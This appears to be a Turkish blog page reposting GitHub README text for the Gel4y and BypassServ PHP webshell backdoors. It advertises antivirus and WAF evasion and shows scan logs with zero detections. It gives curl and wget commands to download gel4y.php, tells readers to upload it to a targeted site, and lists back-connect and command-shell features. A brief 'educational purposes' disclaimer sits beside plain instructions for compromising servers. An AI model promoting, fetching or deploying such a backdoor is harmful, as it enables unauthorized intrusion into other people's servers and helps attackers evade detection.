Gel4y Mini Shell Backdoor
Mehmet SAHIN
BypassServ Mini Shell, clamAV, virustotal vb. gibi antivirüsler tarafından %100 tespit edilemeyen bir webshell arka kapısıdır.
mail(), mb_send_mail işlevleri ve benzeri özel komut atlama (bypass) özelliğiyle hazırlanmıştır; bu, hackerların PHP’deki devre dışı bırakılmış fonksiyonları atlamasına imkân tanır.
Zararlı Yazılım Taraması KaydıBu webshell’in hâlâ kötü amaçlı yazılım olarak algılanıp algılanmadığını görmek için küçük bir test yaptık; elde ettiğimiz sonuçlar şöyledir:
ClamAV----------- SCAN SUMMARY -----------
Known viruses: 8696487
Engine version: 0.103.11
Scanned directories: 1
Scanned files: 2
Infected files: 0
Data scanned: 0.08 MB
Data read: 0.05 MB (ratio 1.62:1)
Time: 12.458 sec (0 m 12 s)
Start Date: 2024:07:29 14:22:06
End Date: 2024:07:29 14:22:18
VirusTotalÖzellikler- Komut Satırı (Command Shell) Mail, Error_log vb. bypass özellikleriyle
- Dosya Yükleme
- Dosya Düzenleme
- Dosya Oluşturma
- Dosya Yeniden Adlandırma
- Klasör/Directory Ekleme
Önemli!
Bu webshell’de bir hata ortaya çıkarsa lütfen bizimle işbirliği yapın.
Sorumluluk Reddi (Disclaimer)Bu depo yalnızca eğitim amaçlıdır. Bu deponun kötü amaçlarla kullanımı, yazarını sorumlu kılmaz. İzin olmaksızın sızma testleri (pentest) yapmayın.
© 2025 GitHub, Inc.
Terms • Privacy • Security • Status • Docs • Contact • Manage cookies • Do not share my personal information
Gel4y Mini Shell BackdoorGel4y Webshell, çok küçük boyutta (10KB’ten az) bir PHP geriye kapı (backdoor) olup PHP prosedürel metodu kullanılarak gizlilik (stealth) modunda oluşturulmuştur. Nano shell yöntemi kullanıldığı için virüs taramasından kolaylıkla kaçabilir. Tehlikeli olarak değerlendirilen bazı PHP fonksiyonlarını engelleyen bazı güvenlik duvarı (WAF) sistemlerini aşmak amacıyla neredeyse tüm PHP fonksiyonları gizlenmiştir (obfuscated).
Artık Gel4y’nin en yeni sürümünde Google tarafından indekslenme önlenmiştir; statü kodu 404 olarak döndürülür. Bu da webshell’inizin diğer hacker’lar tarafından bulunup çalınma ihtimalini düşürür.
< HTTP/1.1 404 Not Found < Host: localhost:1337 < Date: Wed, 06 Dec 2023 19:20:21 GMT < Connection: close < X-Powered-By: PHP/8.2.8 < Content-type: text/html; charset=UTF-8 Nasıl KullanılırBu depodaki dosyaları indirmeniz yeterlidir. Deneyebileceğiniz birkaç basit yöntem şöyledir:
- cURL
curl https://raw.githubusercontent.com/22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor/1.x.x/gel4y.php -o gel4y.php - wget
wget https://raw.githubusercontent.com/22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor/1.x.x/gel4y.php
Bu yöntemler, webshell dosyasını bilgisayarınıza indirir. Ardından tek yapmanız gereken dosyayı hedeflediğiniz siteye yüklemek ve dosya adına göre çağırmaktır.
Örnek: https://server.com/gel4y.php
Zararlı Yazılım Taraması KaydıAyrıca Shellmon ile birlikte de kullanabilirsiniz.
Bu webshell’in hâlâ zararlı olarak tespit edilip edilmediğini görmek için küçük bir test yaptık ve aşağıdaki sonuçları aldık:
[2023-12-03 18:55:10] [INFO] Scan date: 2023-12-03 18:55:10 [2023-12-03 18:55:10] [INFO] Scanning ~/Gel4y-Mini-Shell-Backdoor/gel4y.php [2023-12-03 18:55:10] [INFO] Mapping and retrieving checksums, please wait [2023-12-03 18:55:10] [INFO] Found 1 files to check [2023-12-03 18:55:10] [INFO] Checking files [2023-12-03 18:55:11] [SUCCESS] Scan finished! [2023-12-03 18:55:11] [INFO] Files scanned: 1 [2023-12-03 18:55:11] [INFO] Files edited: 0 [2023-12-03 18:55:11] [INFO] Files quarantined: 0 [2023-12-03 18:55:11] [INFO] Files whitelisted: 0 [2023-12-03 18:55:11] [INFO] Files ignored: 0 [2023-12-03 18:55:11] [INFO] Malware detected: 0 [2023-12-03 18:55:11] [INFO] Malware removed: 0Sonuç gösteriyor ki webshell “Malware Bailout” olarak tespit edilmemiştir.
Özellikler [GÜNCELLENDİ]Sunucularda faydalı olabilecek birkaç özellik bulunuyor. Burada, hedef dosyaları yönetmek için yaygın kullanılan önemli özellikleri ekledik:
- PHP BackConnect
- Komut Satırı (Command Shell)
- Zip Yükleme (Otomatik Çıkarma)
- Obfuscated Code (webshell içinde bir özellik değildir)
- Çoklu Dosya Yükleme
- Klasör ve Dosya Oluşturma
- Dosya İndirme
Bu birkaç özellik, bu shell’i işe yaramaz hâle getirmemektedir.
Geçerliliği Onaylanmış- 403 Forbidden
- 406 Not Acceptable (belki şansınıza :>)
- Imunify360 (her zaman başarılı değil, yaklaşık %85 başarılı oluyor)
Yazdığımız kodla, hacker’ların sıklıkla karşılaştığı bazı güvenlik sistemlerini aşmak için küçük bir araştırma yaptık.
ÖnizlemeBootstrap 4 gibi bilinen bir CSS çatısı (framework) kullanıldığı için, görünüm platformunuza uyum sağlayacak şekilde (responsive) oluşturulmuştur.
TeşekkürlerBu backdoor’u geliştirirken destek aldığımız arkadaşlarımıza teşekkür ederiz:
- IndoXploit
- Indosec
- Marijuana Shell
Bu webshell’de hata görürseniz bize katkıda bulunmaktan çekinmeyin.
© 2025 GitHub, Inc.
Terms • Privacy • Security • Status • Docs • Contact • Manage cookies • Do not share my personal information
0Yorumlar
- (Containerized) Attack Shell
- ALFA SHELL V4.1
- Attack
- Attack Shell
- Basit PHP Shell
- Basit Shell
- BHEH PHP
- BHEH PHP Shell
- BHEH Shell
- Containerized
- Gel4y
- Gel4y Mini Shell
- Gel4y Mini Shell Backdoor
- Gel4y shell
- IndoSec-sHell
- IndoSec-sHell Final
- IndoXploit
- IndoXploit Webshell
- IndoXploit Webshell V.3
- Komut Shell
- MARIJUANA SHELL
- Mini PHP
- mini shell
- Mini Shell PHP
- PHP Komut
- PHP Komut Shell
- PHP Shell
- PHP Shell Detector
- PHP Webshell
- phpbash PHP
- phpbash PHP Shell
- phpbash Shell
- Saldırı Shell'i
- shell
- Shell Detector
- shell download
- shell indir
- Shell PHP
- ssh shell
- sunucuda shell arama
- temiz shell
- Webadmin
- Webadmin Shell
- WwWolF PHP Webshell
- WwWolF Webshell
